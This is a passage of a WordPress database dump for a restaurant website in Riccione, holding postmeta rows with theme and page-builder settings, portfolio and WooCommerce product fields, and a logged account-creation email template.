!important;}'),(40491,1446,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40492,1446,'slide_template','default'),(40493,1446,'mkdf_page_content_behind_header_meta','no'),(40494,1446,'mkdf_video_type_meta','social_networks'),(40495,1446,'mkdf_audio_type_meta','social_networks'),(40496,1446,'mkdf_disable_vertical_header_background_image_meta','no'),(40497,1446,'mkdf_disable_header_widget_areas_meta','no'),(40498,1446,'mkdf_show_title_area_meta','yes'),(40499,1446,'mkdf_title_area_type_meta','attika'),(40500,1446,'_mkdf-like','0'),(52176,4362,'_menu_item_xfn',''),(40502,1446,'_wpb_vc_js_status','true'),(40503,1446,'mkdf_page_content_padding','120px 0 0'),(40504,1446,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(40505,1446,'_dp_original','6'),(44554,3972,'success','1'),(40508,1454,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(40509,1454,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40510,1454,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(40511,1454,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40512,1454,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40513,1454,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(40514,1454,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(40515,1454,'slide_template','default'),(40516,1454,'mkdf_page_content_behind_header_meta','no'),(40517,1454,'mkdf_video_type_meta','social_networks'),(40518,1454,'mkdf_audio_type_meta','social_networks'),(40519,1454,'mkdf_disable_vertical_header_background_image_meta','no'),(40520,1454,'mkdf_disable_header_widget_areas_meta','no'),(40521,1454,'mkdf_show_title_area_meta','yes'),(40522,1454,'mkdf_title_area_type_meta','attika'),(40523,1454,'_mkdf-like','0'),(40525,1454,'_wpb_vc_js_status','true'),(40526,1454,'mkdf_page_content_padding','120px 0 0'),(40527,1454,'_dp_original','1446'),(40528,1454,'_wp_old_slug','strong-recepies-big-chefs-recomendations'),(44555,3972,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(40531,1459,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(40532,1459,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40533,1459,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(40534,1459,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40535,1459,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40536,1459,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40537,1459,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(40538,1459,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(40539,1459,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(40540,1459,'slide_template','default'),(40541,1459,'mkdf_page_content_behind_header_meta','no'),(40542,1459,'mkdf_video_type_meta','social_networks'),(40543,1459,'mkdf_audio_type_meta','social_networks'),(40544,1459,'mkdf_disable_vertical_header_background_image_meta','no'),(40545,1459,'mkdf_disable_header_widget_areas_meta','no'),(40546,1459,'mkdf_show_title_area_meta','yes'),(40547,1459,'mkdf_title_area_type_meta','attika'),(40548,1459,'_mkdf-like','0'),(40550,1459,'_wpb_vc_js_status','true'),(40551,1459,'mkdf_page_content_padding','120px 0 0'),(40552,1459,'_dp_original','1454'),(40553,1459,'_wp_old_slug','new-places-of-attica'),(44560,3972,'original_subject','Your Sol Y Mar account has been created!'),(40556,1462,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(40557,1462,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40558,1462,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(40559,1462,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40560,1462,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40561,1462,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40562,1462,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40563,1462,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(40564,1462,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(40565,1462,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(40566,1462,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(40567,1462,'slide_template','default'),(40568,1462,'mkdf_page_content_behind_header_meta','no'),(40569,1462,'mkdf_video_type_meta','social_networks'),(40570,1462,'mkdf_audio_type_meta','social_networks'),(40571,1462,'mkdf_disable_vertical_header_background_image_meta','no'),(40572,1462,'mkdf_disable_header_widget_areas_meta','no'),(40573,1462,'mkdf_show_title_area_meta','yes'),(40574,1462,'mkdf_title_area_type_meta','attika'),(40575,1462,'_mkdf-like','0'),(40577,1462,'_wpb_vc_js_status','true'),(40578,1462,'mkdf_page_content_padding','120px 0 0'),(40579,1462,'_dp_original','1459'),(40580,1462,'_wp_old_slug','big-chefs-recomendations-strong-recepies'),(44592,3981,'original_message','<!DOCTYPE html>\n<html lang=\"en-US\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Welcome to Sol Y Mar</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">Hi yxyzxxfsdvx,</p>\n<p style=\"margin: 0 0 16px;\">Thanks for creating an account on Sol Y Mar. Your username is <strong>yxyzxxfsdvx</strong>. You can access your account area to view orders, change your password, and more at: <a href=\"https://www.ristorantesolymar.it/mio-account/\" rel=\"nofollow\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">https://www.ristorantesolymar.it/mio-account/</a></p>\n\n<p style=\"margin: 0 0 16px;\">We look forward to seeing you soon.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n'),(44591,3981,'original_subject','Your Sol Y Mar account has been created!'),(44590,3981,'original_to','yxyzxxfsdvx@sdemo.com'),(44589,3981,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(44588,3981,'reply_to_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(44587,3981,'to_header','yxyzxxfsdvx@sdemo.com'),(44585,3981,'success','1'),(44586,3981,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(44584,3981,'solution','All good, mail sent.'),(40603,2931,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40604,2931,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40605,2931,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40606,2931,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40607,2931,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40608,2931,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40609,2931,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52149,4359,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40611,2931,'mkdf_page_content_behind_header_meta','no'),(40612,2931,'mkdf_page_content_padding','115px 0 100px 0'),(40613,2931,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40614,2931,'portfolio_single_back_to_link','1008'),(40615,2931,'mkdf_disable_vertical_header_background_image_meta','no'),(40616,2931,'mkdf_disable_header_widget_areas_meta','no'),(40617,2931,'slide_template','default'),(40618,2931,'_wpb_vc_js_status','true'),(40619,2931,'mkdf-portfolio-image-gallery','567,566,565'),(40620,2931,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40621,2931,'mkdf_portfolio_single_template_meta','small-images'),(40622,2931,'_wp_old_slug','h1-2-2'),(40623,2931,'_wp_old_slug','h2-1'),(40624,2931,'_wp_old_slug','h7-6'),(40625,2931,'_dp_original','2344'),(40626,2932,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40627,2932,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40628,2932,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40629,2932,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40630,2932,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40631,2932,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52242,4369,'_menu_item_icon','null'),(40633,2932,'mkdf_page_content_behind_header_meta','no'),(40634,2932,'mkdf_page_content_padding','115px 0 100px 0'),(40635,2932,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40636,2932,'portfolio_single_back_to_link','1008'),(40637,2932,'mkdf_disable_vertical_header_background_image_meta','no'),(40638,2932,'mkdf_disable_header_widget_areas_meta','no'),(40639,2932,'slide_template','default'),(40640,2932,'_wpb_vc_js_status','true'),(40641,2932,'mkdf-portfolio-image-gallery','567,566,565'),(40642,2932,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40643,2932,'mkdf_portfolio_single_template_meta','small-images'),(40644,2932,'_wp_old_slug','h1-2-2'),(40645,2932,'_wp_old_slug','h2-1'),(40646,2932,'_wp_old_slug','h7-6'),(40647,2932,'_dp_original','1048'),(40648,2933,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40649,2933,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40650,2933,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40651,2933,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40652,2933,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40653,2933,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40654,2933,'mkdf_page_content_behind_header_meta','no'),(40655,2933,'mkdf_page_content_padding','115px 0 100px 0'),(40656,2933,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40657,2933,'portfolio_single_back_to_link','1008'),(40658,2933,'mkdf_disable_vertical_header_background_image_meta','no'),(40659,2933,'mkdf_disable_header_widget_areas_meta','no'),(40660,2933,'slide_template','default'),(40661,2933,'_wpb_vc_js_status','true'),(40662,2933,'mkdf-portfolio-image-gallery','567,566,565'),(40663,2933,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40664,2933,'mkdf_portfolio_single_template_meta','slider'),(40665,2933,'_thumbnail_id','1030'),(40666,2933,'_wp_old_slug','h7-5'),(40667,2933,'_dp_original','1047'),(40668,2934,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40669,2934,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40670,2934,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40671,2934,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40672,2934,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52231,4368,'_menu_item_url','#'),(40674,2934,'mkdf_page_content_behind_header_meta','no'),(40675,2934,'mkdf_page_content_padding','115px 0 100px 0'),(40676,2934,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40677,2934,'portfolio_single_back_to_link','1008'),(40678,2934,'mkdf_disable_vertical_header_background_image_meta','no'),(40679,2934,'mkdf_disable_header_widget_areas_meta','no'),(40680,2934,'slide_template','default'),(40681,2934,'_wpb_vc_js_status','true'),(40682,2934,'mkdf-portfolio-image-gallery','567,566,565'),(40683,2934,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40684,2934,'mkdf_portfolio_single_template_meta','small-images'),(40685,2934,'_wp_old_slug','h1-2-2'),(40686,2934,'_wp_old_slug','h2-1'),(40687,2934,'_wp_old_slug','h7-4'),(40688,2934,'_dp_original','1019'),(40689,2935,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40690,2935,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40691,2935,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40692,2935,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40693,2935,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40694,2935,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40695,2935,'mkdf_page_content_behind_header_meta','no'),(40696,2935,'mkdf_page_content_padding','115px 0 100px 0'),(40697,2935,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40698,2935,'portfolio_single_back_to_link','1008'),(40699,2935,'mkdf_disable_vertical_header_background_image_meta','no'),(40700,2935,'mkdf_disable_header_widget_areas_meta','no'),(40701,2935,'slide_template','default'),(40702,2935,'_wpb_vc_js_status','true'),(40703,2935,'mkdf-portfolio-image-gallery','567,566,565'),(40704,2935,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40705,2935,'mkdf_portfolio_single_template_meta','gallery'),(40707,2935,'_wp_old_slug','h7-1'),(40708,2935,'_dp_original','1022'),(40709,2936,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40710,2936,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40711,2936,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40712,2936,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40713,2936,'mkdf_page_content_behind_header_meta','no'),(40714,2936,'mkdf_page_content_padding','115px 0 100px 0'),(40715,2936,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40716,2936,'portfolio_single_back_to_link','610'),(40717,2936,'mkdf_disable_vertical_header_background_image_meta','no'),(40718,2936,'mkdf_disable_header_widget_areas_meta','no'),(40719,2936,'slide_template','default'),(40720,2936,'_wpb_vc_js_status','false'),(40721,2936,'mkdf-portfolio-image-gallery','565,566,567'),(40722,2936,'mkdf_portfolio_single_template_meta','images'),(40723,2936,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40724,2936,'_thumbnail_id','1103'),(40725,2936,'_wp_old_slug','h6-9'),(40726,2936,'_dp_original','660'),(40727,2937,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40728,2937,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40729,2937,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40730,2937,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40731,2937,'mkdf_page_content_behind_header_meta','no'),(40732,2937,'mkdf_page_content_padding','115px 0 100px 0'),(40733,2937,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40734,2937,'portfolio_single_back_to_link','610'),(40735,2937,'mkdf_disable_vertical_header_background_image_meta','no'),(40736,2937,'mkdf_disable_header_widget_areas_meta','no'),(40737,2937,'slide_template','default'),(40738,2937,'_wpb_vc_js_status','false'),(40739,2937,'mkdf-portfolio-image-gallery','565,566,567'),(40740,2937,'mkdf_portfolio_single_template_meta','images'),(40741,2937,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40742,2937,'_thumbnail_id','1103'),(40743,2937,'_wp_old_slug','h6-9'),(40744,2937,'_dp_original','660'),(40745,2937,'_wp_old_slug','ice-dream-3__trashed'),(40746,2938,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40747,2938,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40748,2938,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40749,2938,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40750,2938,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40751,2938,'mkdf_page_content_behind_header_meta','no'),(40752,2938,'mkdf_page_content_padding','115px 0 100px 0'),(40753,2938,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40754,2938,'portfolio_single_back_to_link','610'),(40755,2938,'mkdf_disable_vertical_header_background_image_meta','no'),(40756,2938,'mkdf_disable_header_widget_areas_meta','no'),(40757,2938,'slide_template','default'),(40758,2938,'_wpb_vc_js_status','true'),(40759,2938,'mkdf-portfolio-image-gallery','567,566,565'),(40760,2938,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40761,2938,'mkdf_portfolio_single_template_meta','small-images'),(40762,2938,'_thumbnail_id','1102'),(40763,2938,'_wp_old_slug','h6-8'),(40764,2938,'_dp_original','659'),(40765,2939,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40766,2939,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40767,2939,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40768,2939,'mkdf_page_content_behind_header_meta','no'),(40769,2939,'mkdf_page_content_padding','115px 0 100px 0'),(40770,2939,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40771,2939,'portfolio_single_back_to_link','610'),(40772,2939,'mkdf_disable_vertical_header_background_image_meta','no'),(40773,2939,'mkdf_disable_header_widget_areas_meta','no'),(40774,2939,'slide_template','default'),(40775,2939,'_wpb_vc_js_status','false'),(40776,2939,'mkdf-portfolio-image-gallery','565,566,567'),(40777,2939,'mkdf_portfolio_single_template_meta','images'),(40778,2939,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40779,2939,'_thumbnail_id','1101'),(40780,2939,'_wp_old_slug','h6-7'),(40781,2939,'_dp_original','648'),(40782,2940,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40783,2940,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40784,2940,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40785,2940,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40786,2940,'mkdf_page_content_behind_header_meta','no'),(40787,2940,'mkdf_page_content_padding','115px 0 100px 0'),(40788,2940,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40789,2940,'portfolio_single_back_to_link','610'),(40790,2940,'mkdf_disable_vertical_header_background_image_meta','no'),(40791,2940,'mkdf_disable_header_widget_areas_meta','no'),(40792,2940,'slide_template','default'),(40793,2940,'_wpb_vc_js_status','true'),(40794,2940,'mkdf-portfolio-image-gallery','567,566,565'),(40795,2940,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40796,2940,'mkdf_portfolio_single_template_meta','small-images'),(40797,2940,'_thumbnail_id','1121'),(40798,2940,'_wp_old_slug','h6-6'),(40799,2940,'_dp_original','649'),(40800,2941,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40801,2941,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40802,2941,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40803,2941,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40804,2941,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40805,2941,'mkdf_page_content_behind_header_meta','no'),(40806,2941,'mkdf_page_content_padding','115px 0 100px 0'),(40807,2941,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40808,2941,'portfolio_single_back_to_link','610'),(40809,2941,'mkdf_disable_vertical_header_background_image_meta','no'),(40810,2941,'mkdf_disable_header_widget_areas_meta','no'),(40811,2941,'slide_template','default'),(40812,2941,'_wpb_vc_js_status','true'),(40813,2941,'mkdf-portfolio-image-gallery','567,566,565'),(40814,2941,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40815,2941,'mkdf_portfolio_single_template_meta','gallery'),(40816,2941,'_thumbnail_id','1099'),(40817,2941,'_wp_old_slug','h6-5'),(40818,2941,'_dp_original','645'),(40819,2942,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40820,2942,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40821,2942,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40822,2942,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40823,2942,'mkdf_page_content_behind_header_meta','no'),(40824,2942,'mkdf_page_content_padding','115px 0 100px 0'),(40825,2942,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40826,2942,'portfolio_single_back_to_link','610'),(40827,2942,'mkdf_disable_vertical_header_background_image_meta','no'),(40828,2942,'mkdf_disable_header_widget_areas_meta','no'),(40829,2942,'slide_template','default'),(40830,2942,'_wpb_vc_js_status','true'),(40831,2942,'mkdf-portfolio-image-gallery','565,566,567'),(40832,2942,'mkdf_portfolio_single_template_meta','small-slider'),(40833,2942,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40834,2942,'_thumbnail_id','1097'),(40835,2942,'_wp_old_slug','h6-4'),(40836,2942,'_wp_old_slug','cream-soup'),(40837,2942,'_dp_original','644'),(40840,3770,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(40841,3770,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40842,3770,'slide_template','default'),(40843,3770,'mkdf_page_content_behind_header_meta','no'),(40844,3770,'mkdf_video_type_meta','social_networks'),(40845,3770,'mkdf_audio_type_meta','social_networks'),(40846,3770,'mkdf_disable_vertical_header_background_image_meta','no'),(40847,3770,'mkdf_disable_header_widget_areas_meta','no'),(40848,3770,'mkdf_show_title_area_meta','yes'),(40849,3770,'mkdf_title_area_type_meta','attika'),(40850,3770,'_mkdf-like','0'),(40851,3770,'_thumbnail_id','8'),(40852,3770,'_wpb_vc_js_status','true'),(40853,3770,'mkdf_page_content_padding','120px 0 0'),(40854,3770,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(40855,3770,'_wp_old_date','2018-07-27'),(40856,3106,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40857,3106,'_wc_review_count','1'),(40858,3106,'_wc_rating_count','a:1:{i:4;i:1;}'),(40859,3106,'_wc_average_rating','4.00'),(40860,3106,'_thumbnail_id','38'),(40861,3106,'mkdf_show_new_sign_woo_meta','no'),(40862,3106,'_sku','PR0014'),(40863,3106,'_regular_price','48'),(40864,3106,'_sale_price',''),(40865,3106,'_sale_price_dates_from',''),(40866,3106,'_sale_price_dates_to',''),(40867,3106,'total_sales','0'),(40868,3106,'_tax_status','taxable'),(40869,3106,'_tax_class',''),(40870,3106,'_manage_stock','no'),(40871,3106,'_backorders','no'),(40872,3106,'_sold_individually','no'),(40873,3106,'_weight','310'),(40874,3106,'_length',''),(40875,3106,'_width',''),(40876,3106,'_height',''),(40877,3106,'_upsell_ids','a:0:{}'),(40878,3106,'_crosssell_ids','a:0:{}'),(40879,3106,'_purchase_note',''),(40880,3106,'_default_attributes','a:0:{}'),(40881,3106,'_virtual','no'),(40882,3106,'_downloadable','no'),(40883,3106,'_product_image_gallery',''),(40884,3106,'_download_limit','-1'),(40885,3106,'_download_expiry','-1'),(40886,3106,'_stock',''),(40887,3106,'_stock_status','instock'),(40888,3106,'_product_version','3.4.3'),(40889,3106,'_price','48'),(40890,3106,'slide_template','default'),(40891,3106,'_wpb_vc_js_status','false'),(40892,3106,'_wp_old_slug','crispy-sesame-cake'),(40893,3106,'_wp_old_slug','charleston-shrimp-grits'),(40894,3106,'_wp_old_slug','garnished-charleston-shrimp'),(40895,3106,'_wp_old_slug','garnished-magnolias-shrimp'),(40896,98,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40897,98,'_sku','PR0015'),(40898,98,'_regular_price','67'),(40899,98,'_sale_price',''),(40900,98,'_sale_price_dates_from',''),(40901,98,'_sale_price_dates_to',''),(40902,98,'total_sales','0'),(40903,98,'_tax_status','taxable'),(40904,98,'_tax_class',''),(40905,98,'_manage_stock','no'),(40906,98,'_backorders','no'),(40907,98,'_sold_individually','no'),(40908,98,'_weight','400'),(40909,98,'_length',''),(40910,98,'_width',''),(40911,98,'_height',''),(40912,98,'_upsell_ids','a:0:{}'),(40913,98,'_crosssell_ids','a:0:{}'),(40914,98,'_purchase_note',''),(40915,98,'_default_attributes','a:0:{}'),(